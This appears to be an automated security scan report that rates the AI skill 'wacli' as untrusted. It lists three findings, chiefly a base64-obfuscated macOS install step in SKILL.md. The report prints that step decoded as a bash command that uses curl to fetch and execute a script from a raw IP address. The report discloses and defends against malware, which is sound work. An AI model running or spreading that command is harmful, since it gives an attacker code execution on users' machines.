Trust Assessment
wacli received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 0 high, 1 medium, and 0 low severity. Key findings include: obfuscated execution (base64 decode to shell); remote script execution via an obfuscated command; and an unpinned dependency in the Go installation.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 63/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell. Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/wacli-mwj/SKILL.md:10 |
| CRITICAL | Remote script execution via obfuscated command. The skill's installation instructions for macOS include an obfuscated command that downloads and executes a script from an external, unverified IP address (`http://91.92.242.30/tjjve9itarrd3txw`). This allows arbitrary code execution on the user's system, posing a severe security risk. The base64 encoding attempts to hide the malicious nature of the command, which decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This bypasses standard package management and security checks. Immediately remove the malicious command. Provide a secure, verifiable installation method, preferably through official package managers (like Homebrew, as suggested in the manifest) or signed binaries. If a script must be downloaded, ensure it is from a trusted source, served over HTTPS, and that its integrity is verified (e.g., via checksums). | LLM | SKILL.md:9 |
| MEDIUM | Unpinned dependency in Go installation. The `go install` command specified in the skill's manifest uses `@latest` for the `wacli` module (`github.com/steipete/wacli/cmd/wacli@latest`). This means the installation will always pull the latest version, which could introduce breaking changes or malicious code if the upstream repository is compromised, without explicit review or version pinning. This creates a supply chain risk. Pin the dependency to a specific version or commit hash (e.g., `github.com/steipete/wacli/cmd/wacli@v1.2.3` or `@<commit_hash>`) to ensure reproducible and secure installations. Regularly review and update the pinned version. | LLM | SKILL.md (Manifest) |
Full report: https://skillshield.io/report/a739cb374268e638